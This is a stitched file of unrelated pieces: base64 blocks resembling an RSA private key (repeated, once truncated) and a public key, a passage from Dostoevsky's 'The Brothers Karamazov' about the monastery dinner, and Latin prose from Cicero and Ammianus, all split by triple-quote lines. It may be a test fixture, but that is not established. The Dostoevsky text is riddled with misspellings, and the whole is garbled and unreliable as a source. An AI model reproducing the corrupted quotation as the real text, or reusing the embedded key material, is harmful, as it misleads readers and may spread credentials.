E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Itaque verae amicitiae difficillime reperiuntur in iis qui in honoribus reque publica versantur; ubi enim istum invenias qui honorem amici anteponat suo? Quid? Haec ut omittam, quam graves, quam difficiles plerisque videntur calamitatum societates! Ad quas non est facile inventu qui descendant. Quamquam Ennius recte.
Et interdum acciderat, ut siquid in penetrali secreto nullo citerioris vitae ministro praesente paterfamilias uxori susurrasset in aurem, velut Amphiarao referente aut Marcio, quondam vatibus inclitis, postridie disceret imperator. ideoque etiam parietes arcanorum soli conscii timebantur.
Iamque lituis cladium concrepantibus internarum non celate ut antea turbidum saeviebat ingenium a veri consideratione detortum et nullo inpositorum vel conpositorum fidem sollemniter inquirente nec discernente a societate noxiorum insontes velut exturbatum e iudiciis fas omne discessit, et causarum legitima silente defensione carnifex rapinarum sequester et obductio capitum et bonorum ubique multatio versabatur per orientales provincias, quas recensere puto nunc oportunum absque Mesopotamia digesta, cum bella Parthica dicerentur, et Aegypto, quam necessario aliud reieci ad tempus.
Eodem tempore Serenianus ex duce, cuius ignavia populatam in Phoenice Celsen ante rettulimus, pulsatae maiestatis imperii reus iure postulatus ac lege, incertum qua potuit suffragatione absolvi, aperte convictus familiarem suum cum pileo, quo caput operiebat, incantato vetitis artibus ad templum misisse fatidicum, quaeritatum expresse an ei firmum portenderetur imperium, ut cupiebat, et cunctum.
Utque aegrum corpus quassari etiam levibus solet offensis, ita animus eius angustus et tener, quicquid increpuisset, ad salutis suae dispendium existimans factum aut cogitatum, insontium caedibus fecit victoriam luctuosam.
Nec sane haec sola pernicies orientem diversis cladibus adfligebat. Namque et Isauri, quibus est usitatum saepe pacari saepeque inopinis excursibus cuncta miscere, ex latrociniis occultis et raris, alente inpunitate adulescentem in peius audaciam ad bella gravia proruperunt, diu quidem perduelles spiritus inrequietis motibus erigentes, hac tamen indignitate perciti vehementer, ut iactitabant, quod eorum capiti quidam consortes apud Iconium Pisidiae oppidum in amphitheatrali spectaculo feris praedatricibus obiecti sunt praeter morem.
Unde Rufinus ea tempestate praefectus praetorio ad discrimen trusus est ultimum. ire enim ipse compellebatur ad militem, quem exagitabat inopia simul et feritas, et alioqui coalito more in ordinarias dignitates asperum semper et saevum, ut satisfaceret atque monstraret, quam ob causam annonae convectio sit impedita.
Hac ita persuasione reducti intra moenia bellatores obseratis undique portarum aditibus, propugnaculis insistebant et pinnis, congesta undique saxa telaque habentes in promptu, ut si quis se proripuisset interius, multitudine missilium sterneretur et lapidum.
Nihil est enim virtute amabilius, nihil quod magis adliciat ad diligendum, quippe cum propter virtutem et probitatem etiam eos, quos numquam vidimus, quodam modo diligamus. Quis est qui C. Fabrici, M'. Curi non cum caritate aliqua benevola memoriam usurpet, quos numquam viderit? quis autem est, qui Tarquinium Superbum, qui Sp. Cassium, Sp. Maelium non oderit? Cum duobus ducibus de imperio in Italia est decertatum, Pyrrho et Hannibale; ab altero propter probitatem eius non nimis alienos animos habemus, alterum propter crudelitatem semper haec civitas oderit.
Sed cautela nimia in peiores haeserat plagas, ut narrabimus postea, aemulis consarcinantibus insidias graves apud Constantium, cetera medium principem sed siquid auribus eius huius modi quivis infudisset ignotus, acerbum et inplacabilem et in hoc causarum titulo dissimilem sui.
Isdem diebus Apollinaris Domitiani gener, paulo ante agens palatii Caesaris curam, ad Mesopotamiam missus a socero per militares numeros immodice scrutabatur, an quaedam altiora meditantis iam Galli secreta susceperint scripta, qui conpertis Antiochiae gestis per minorem Armeniam lapsus Constantinopolim petit exindeque per protectores retractus artissime tenebatur.
Vide, quantum, inquam, fallare, Torquate. oratio me istius philosophi non offendit; nam et complectitur verbis, quod vult, et dicit plane, quod intellegam; et tamen ego a philosopho, si afferat eloquentiam, non asperner, si non habeat, non admodum flagitem. re mihi non aeque satisfacit, et quidem locis pluribus. sed quot homines, tot sententiae; falli igitur possumus.
Ibi victu recreati et quiete, postquam abierat timor, vicos opulentos adorti equestrium adventu cohortium, quae casu propinquabant, nec resistere planitie porrecta conati digressi sunt retroque concedentes omne iuventutis robur relictum in sedibus acciverunt.
Ego vero sic intellego, Patres conscripti, nos hoc tempore in provinciis decernendis perpetuae pacis habere oportere rationem. Nam quis hoc non sentit omnia alia esse nobis vacua ab omni periculo atque etiam suspicione belli?
Ac ne quis a nobis hoc ita dici forte miretur, quod alia quaedam in hoc facultas sit ingeni, neque haec dicendi ratio aut disciplina, ne nos quidem huic uni studio penitus umquam dediti fuimus. Etenim omnes artes, quae ad humanitatem pertinent, habent quoddam commune vinculum, et quasi cognatione quadam inter se continentur.
Iis igitur est difficilius satis facere, qui se Latina scripta dicunt contemnere. in quibus hoc primum est in quo admirer, cur in gravissimis rebus non delectet eos sermo patrius, cum idem fabellas Latinas ad verbum e Graecis expressas non inviti legant. quis enim tam inimicus paene nomini Romano est, qui Ennii Medeam aut Antiopam Pacuvii spernat aut reiciat, quod se isdem Euripidis fabulis delectari dicat, Latinas litteras oderit?
Post quorum necem nihilo lenius ferociens Gallus ut leo cadaveribus pastus multa huius modi scrutabatur. quae singula narrare non refert, me professione modum, quod evitandum est, excedamus.
Ipsam vero urbem Byzantiorum fuisse refertissimam atque ornatissimam signis quis ignorat? Quae illi, exhausti sumptibus bellisque maximis, cum omnis Mithridaticos impetus totumque Pontum armatum affervescentem in Asiam atque erumpentem, ore repulsum et cervicibus interclusum suis sustinerent, tum, inquam, Byzantii et postea signa illa et reliqua urbis ornanemta sanctissime custodita tenuerunt.
Nisi mihi Phaedrum, inquam, tu mentitum aut Zenonem putas, quorum utrumque audivi, cum mihi nihil sane praeter sedulitatem probarent, omnes mihi Epicuri sententiae satis notae sunt. atque eos, quos nominavi, cum Attico nostro frequenter audivi, cum miraretur ille quidem utrumque, Phaedrum autem etiam amaret, cotidieque inter nos ea, quae audiebamus, conferebamus, neque erat umquam controversia, quid ego intellegerem, sed quid probarem.
Paphius quin etiam et Cornelius senatores, ambo venenorum artibus pravis se polluisse confessi, eodem pronuntiante Maximino sunt interfecti. pari sorte etiam procurator monetae extinctus est. Sericum enim et Asbolium supra dictos, quoniam cum hortaretur passim nominare, quos vellent, adiecta religione firmarat, nullum igni vel ferro se puniri iussurum, plumbi validis ictibus interemit. et post hoe flammis Campensem aruspicem dedit, in negotio eius nullo sacramento constrictus.
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
